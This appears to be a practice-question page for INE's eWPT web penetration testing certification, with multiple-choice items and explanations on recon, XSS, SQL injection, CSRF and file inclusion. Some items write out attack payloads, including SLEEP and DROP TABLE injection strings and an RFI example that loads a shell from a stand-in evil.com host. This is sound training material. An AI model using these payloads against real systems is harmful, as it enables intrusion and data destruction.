
100+ Free eWPT Practice Questions

eWPT Web Application Penetration Tester (INE Security) practice questions are available now; exam metadata is being verified.

When testing a web application for SSRF (Server-Side Request Forgery), which URL would a tester inject to attempt to access cloud instance metadata?


Key Facts: eWPT Exam

Exam Format: Practical (source: INE Security)
Certification Validity: 3 years (source: INE Security)
INE Premium (includes exam): ~$749/yr (source: INE Security)
Exam Environment: Browser-based (source: INE Security)
Scoring Method: Auto-graded (source: INE Security)
Content Areas: 6 domains (source: INE eWPT Blueprint)

The eWPT (eWPTv2) from INE Security is a practical, hands-on web application penetration testing certification conducted in a browser-based Kali Linux lab. Candidates must identify and exploit web vulnerabilities (SQLi, XSS, CSRF, IDOR, LFI/RFI, file upload) using industry-standard tools including Burp Suite and SQLMap. Certification is valid 3 years. INE Premium subscription (~$749/year) includes the course and exam. This practice test covers the theoretical knowledge — the real exam requires live exploitation.

Sample eWPT Practice Questions

Try these sample questions to test your eWPT exam readiness. Each question includes a detailed explanation. Start the interactive quiz above for the full 100+ question experience with AI tutoring.

1. During a web application penetration test, which phase is typically performed FIRST after scoping is agreed upon?
A. Information gathering and reconnaissance
B. Exploitation of identified vulnerabilities
C. Vulnerability assessment and scanning
D. Report writing and remediation advice
Explanation: Information gathering and reconnaissance is the first technical phase of a web app pentest after pre-engagement. It establishes the attack surface—domains, subdomains, technologies, and entry points—before any analysis or exploitation begins. Testing blindly without recon leads to missed vulnerabilities and wasted effort.
2. A tester uses `robots.txt` to enumerate restricted paths on a target web server. Which phase of the OWASP Web Security Testing Guide (WSTG) does this best represent?
A. Information gathering
B. Authentication testing
C. Session management testing
D. Input validation testing
Explanation: Reviewing `robots.txt` is a classic information-gathering technique documented in WSTG-INFO-01. The file often reveals directories the administrator does not want indexed, giving testers a list of potentially sensitive endpoints to probe further.
3. Which tool is most commonly used for intercepting and modifying HTTP/HTTPS traffic during a web application pentest?
A. Nmap
B. Metasploit Framework
C. Burp Suite
D. Hydra
Explanation: Burp Suite is the industry-standard web application testing proxy. It intercepts HTTP/HTTPS requests and responses, allowing the tester to inspect, modify, replay, and fuzz web traffic. Its Repeater, Intruder, and Scanner modules cover most web testing activities.
4. During web fingerprinting, a tester sends an `OPTIONS` request to the target. Which of the following responses would indicate a misconfiguration worth escalating?
A. HTTP 200 with 'Allow: GET, POST, HEAD'
B. HTTP 405 Method Not Allowed
C. HTTP 200 with 'Allow: GET, POST, PUT, DELETE, TRACE'
D. HTTP 403 Forbidden
Explanation: An `Allow` header that lists TRACE and DELETE indicates that dangerous HTTP methods are permitted. TRACE can be abused in cross-site tracing (XST) attacks, and DELETE, where the server honours it, allows file deletion. These methods should be disabled on production servers, and a tester should confirm the methods actually work rather than trusting the `Allow` header alone.
5. A tester discovers that a web application reflects user input directly in a script block without encoding: `<script>var user='PAYLOAD';</script>`. Which type of XSS vulnerability is this?
A. Reflected XSS
B. Stored XSS
C. DOM-based XSS
D. Blind XSS
Explanation: Reflected XSS occurs when user-supplied data is immediately echoed back in the server's response without persistent storage. The payload travels from the request directly into the rendered page. The injection point inside a script block means the attacker can break out of the string with `';` and inject arbitrary JavaScript.
6. Which SQL injection payload is used to test for time-based blind SQLi on a MySQL backend?
A. ' AND SLEEP(5)--
B. ' OR 1=1--
C. '; DROP TABLE users;--
D. ' UNION SELECT NULL--
Explanation: If the injected expression is evaluated, `AND SLEEP(5)` causes MySQL to pause for 5 seconds, confirming injection without any visible output in the response. This is the standard time-based blind technique: a measurable delay indicates that the injected SQL was executed.
7. Which Gobuster command correctly brute-forces directories on a target web application using a wordlist?
A. gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
B. gobuster dns -d target.com -w /usr/share/wordlists/dirb/common.txt
C. gobuster vhost -u http://target.com -w wordlist.txt
D. gobuster fuzz -u http://target.com/FUZZ -w wordlist.txt
Explanation: `gobuster dir` mode performs directory and file brute-forcing. The `-u` flag sets the target URL, and `-w` specifies the wordlist. This is the primary command for enumerating hidden paths on web servers during recon.
8. A web application stores session tokens in cookies without the `HttpOnly` flag set. What attack does this primarily enable?
A. SQL injection via cookie manipulation
B. Session fixation attacks
C. Cross-site scripting theft of session cookies
D. CSRF token bypass
Explanation: The `HttpOnly` flag prevents JavaScript from reading a cookie via `document.cookie`. Without it, an XSS payload can steal the session token and send it to the attacker, enabling session hijacking. This is why `HttpOnly` is a critical defence against XSS-based session theft.
9. Which attack technique allows an attacker to include a remote file hosted on an attacker-controlled server into a PHP application?
A. Remote File Inclusion (RFI)
B. Local File Inclusion (LFI)
C. Server-Side Template Injection (SSTI)
D. Path Traversal
Explanation: Remote File Inclusion (RFI) exploits PHP functions like `include()` or `require()` that accept user-controlled paths. When the application fetches a URL pointing to an attacker's server (e.g., `?page=http://evil.com/shell.php`), it executes the remote PHP code, leading to remote code execution.
10. During a CSRF vulnerability assessment, which HTTP request characteristic is the MOST important to verify as absent?
A. Absence of a valid anti-CSRF token in the request
B. Absence of the Content-Type header
C. Absence of HTTPS in the request URL
D. Absence of the User-Agent header
Explanation: CSRF attacks work by tricking a browser into making an authenticated request on behalf of a victim. The primary defence is an unpredictable anti-CSRF token (synchronizer token pattern or double-submit cookie). If the server does not validate a CSRF token in state-changing requests, the endpoint is vulnerable.

About the eWPT Practice Questions

Verified exam format metadata for eWPT Web Application Penetration Tester (INE Security) is pending. The practice questions above remain available while official exam length, timing, passing score, fee, and administrator details are reviewed.